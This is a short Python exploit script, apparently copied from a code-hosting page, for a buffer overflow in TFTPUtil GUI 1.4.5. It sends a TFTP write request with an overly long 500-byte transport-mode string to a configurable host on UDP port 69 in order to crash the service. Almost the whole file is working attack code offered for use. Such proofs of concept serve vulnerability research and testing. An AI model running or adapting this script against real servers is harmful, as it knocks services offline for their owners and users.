42 lines
No EOL
1.4 KiB
Python
Executable file
42 lines
No EOL
1.4 KiB
Python
Executable file
# Exploit Title: TFTPGUI Long Transport Mode Overflow
|
|
# Date: 5/1/2010
|
|
# Author: Jeremiah Talamantes
|
|
# Software Link: http://sourceforge.net/projects/tftputil/files/TFTPUtil/TFTPUtil%20Version%201.4.5/TFTPUtil_GUI_Version_1.4.5_Binary_Installer.exe/download
|
|
# Version: 1.4.5
|
|
# Tested on: Windows XP, SP2 (En)
|
|
# CVE : N/A
|
|
|
|
#!/usr/bin/python
|
|
print "\n#################################################################"
|
|
print "## RedTeam Security ##"
|
|
print "## TFTPGUI Long Transport Mode Overflow ##"
|
|
print "## Version 1.4.5 ##"
|
|
print "## LIST Vulnerability ##"
|
|
print "## ##"
|
|
print "## Jeremiah Talamantes ##"
|
|
print "## labs@redteamsecure.com ##"
|
|
print "################################################################# \n"
|
|
|
|
import socket
|
|
import sys
|
|
|
|
# Change these values to suit your needs
|
|
host = '192.168.1.108'
|
|
port = 69
|
|
|
|
try:
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
except:
|
|
print "Error: unable to connect."
|
|
sys.exit(1)
|
|
|
|
# Creating the overly long transport mode string
|
|
fn = "A"
|
|
md = "A" * 500
|
|
stuff = "\x00\x02" + fn + "\0" + md + "\0"
|
|
|
|
# Send data
|
|
s.sendto(stuff, (host, port))
|
|
print "Check to see if TFTPGUI is still running..."
|
|
|
|
# End |